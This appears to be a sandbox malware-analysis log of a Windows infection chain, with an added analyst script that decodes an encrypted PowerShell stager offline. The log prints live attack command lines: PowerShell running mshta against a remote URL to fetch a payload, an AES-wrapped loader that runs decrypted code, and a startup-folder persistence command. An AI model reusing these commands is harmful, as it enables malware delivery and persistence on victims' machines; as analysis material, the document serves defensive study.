Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (111 identical entries)
Source: C:\Users\Public\Guard.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Users\Public\Guard.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (8 identical entries)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1038
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5676
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1246
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2411
Source: C:\Windows\System32\mshta.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | API coverage: 3.8 %
Source: C:\Users\Public\Guard.exe | API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | API coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052 | Thread sleep count: 1038 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040 | Thread sleep count: 424 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7320 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560 | Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6796 | Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6288 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460 | Thread sleep count: 6766 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464 | Thread sleep count: 2411 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540 | Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8476 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC7C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC42F50 FindFirstFileExW
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC8A874 FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC8A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC86428 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC8A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC7BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC7B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC872A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC871F4 FindFirstFileW,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BB494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBCD14 FindFirstFileW,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BBFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00BB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00854005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0085FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_00853CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC21D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (8 identical entries)
Source: SwiftWrite.pif, 0000001B.00000002.2681284227.00000000039F6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld_;
Source: mshta.exe, 00000006.00000003.1765184654.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1790844992.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB36000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW7
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B4575000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWY
Source: svchost.exe, 00000008.00000002.2672036263.000001E22582B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B45D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
Source: mshta.exe, 00000006.00000002.1790844992.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785173676.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1791244275.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486287260.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2680822262.000001E22AE55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000001A.00000002.1917240026.0000028A13ED0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\)
Source: powershell.exe, 00000009.00000002.1742720854.0000028236D23000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\1d
Source: mshta.exe, 00000006.00000002.1794143258.0000021D20670000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: powershell.exe, 00000009.00000002.1742720854.0000028236CF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.0000000003833000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Guard.exe | API call chain: ExitProcess graph end node (2 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC90A00 BlockInput
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC037B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC25BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC06D64 LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC6CDC4 GetProcessHeap,HeapAlloc,InitializeAcl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (5 identical entries)
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC48FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC3AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC259C8 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC257E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B7A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Guard.exe | Code function: 23_2_00B7A354 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0081A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 27_2_0081A354 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_00007FF7ADC6CE68
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC037B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00007FF7ADC037B0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC24514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00007FF7ADC24514
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC94C58 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,15_2_00007FF7ADC94C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\XKIZdXAs.exe "C:\Users\user\AppData\Roaming\XKIZdXAs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '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';function vyg ($mgzihqt){return -split ($mgzihqt -replace '..', '0x$& ')};$wavg = vyg($ddg.substring(0, 2048));$skz = [system.security.cryptography.aes]::create();$skz.key = vyg($ddg.substring(2048));$skz.iv = new-object byte[] 16;$mzouvbl = $skz.createdecryptor();$kbnmjip = [system.string]::new($mzouvbl.transformfinalblock($wavg, 0,$wavg.length)); sal fd $kbnmjip.substring(3,3); fd $kbnmjip.substring(6)
Source: C:\Users\Public\Guard.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
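The mshta-spawned PowerShell command above is a self-contained stager: `$ddg` is one hex string, the first 2048 hex characters are AES-CBC ciphertext, the remainder is the key, the IV is sixteen zero bytes, and the decrypted text is executed by aliasing characters 3..5 (expected to be `iex`) as `fd` and invoking it on the rest. The following is an added example, not code from the report or from the sample, that reproduces that decryption offline so the next stage can be read instead of run. The function names are ours; the test blob is constructed here with a demo key, since the report redacts the real `$ddg` value.

```powershell
# Added example (not code from the report or the sample): reproduce the stager's
# decryption offline so the second stage can be read instead of executed.
# Names (ConvertFrom-HexString, Invoke-StagerDecode, New-ConstructedBlob) are ours.

function ConvertFrom-HexString {
    # Equivalent of the stager's vyG: two hex characters per byte, no separators.
    param([Parameter(Mandatory)][string]$Hex)
    $bytes = New-Object byte[] ($Hex.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }
    return ,$bytes   # the comma keeps the byte[] intact instead of unrolling it
}

function Invoke-StagerDecode {
    param(
        [Parameter(Mandatory)][string]$Blob,   # the value of $ddg from the captured command line
        [int]$CipherHexLength = 2048           # the sample splits $ddg at 2048: ciphertext first, key after
    )
    $cipher = ConvertFrom-HexString $Blob.Substring(0, $CipherHexLength)
    $key    = ConvertFrom-HexString $Blob.Substring($CipherHexLength)

    $aes = [System.Security.Cryptography.Aes]::Create()   # defaults: CBC, PKCS7, as in the sample
    $aes.Key = $key
    $aes.IV  = New-Object byte[] 16                       # all-zero IV, as in the sample
    $plainBytes = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)

    # [String]::new(byte[]) in the stager widens each byte to one char; mirror that.
    $plain = [string]::new([char[]]$plainBytes)

    [pscustomobject]@{
        Command = $plain.Substring(3, 3)   # 'sal fd <this>' aliases it as fd (expect iex)
        Script  = $plain.Substring(6)      # what fd is then invoked on: the next stage
        Plain   = $plain
    }
}

function New-ConstructedBlob {
    # Constructed test input only: encrypts a harmless script the same way the
    # sample's blob was, so the decoder can be exercised without the real payload.
    param([string]$Script = "Write-Output 'second stage'")
    $plain = 'abc' + 'iex' + ' ' + $Script     # 3 filler chars, the command name, then the script
    $key   = [byte[]](0..15)                   # demo key; the real blob carries its own after offset 2048
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $key
    $aes.IV  = New-Object byte[] 16
    $pt = [byte[]][char[]]$plain
    $ct = $aes.CreateEncryptor().TransformFinalBlock($pt, 0, $pt.Length)
    $hex = { param($b) ($b | ForEach-Object { $_.ToString('x2') }) -join '' }
    [pscustomobject]@{
        Blob            = (& $hex $ct) + (& $hex $key)
        CipherHexLength = 2 * $ct.Length
    }
}

$demo   = New-ConstructedBlob
$result = Invoke-StagerDecode -Blob $demo.Blob -CipherHexLength $demo.CipherHexLength
$result | Format-List   # Command: iex   Script:  Write-Output 'second stage'
```

On a real capture, paste the `$ddg` value into `Invoke-StagerDecode -Blob ... -CipherHexLength 2048` and read `Script`; never let `fd`/`iex` run. Because the key travels inside the same command line, the ciphertext is not protecting anything from an analyst, only from string-based scanners. Note also that `-ep Unrestricted` does not disable PowerShell script block logging, so on hosts with it enabled the decrypted stage is also recoverable from event 4104.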
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC6C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_00007FF7ADC6C5FC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC6D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_00007FF7ADC6D540
Source: powershell.exe, 00000009.00000002.1680477076.000002822EC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1680477076.000002822EEB3000.00000004.00000800.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: XKIZdXAs.exe, Guard.exe, SwiftWrite.pif | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exe | Code function: 15_2_00007FF7ADC3FD20 cpuid 15_2_00007FF7ADC3FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
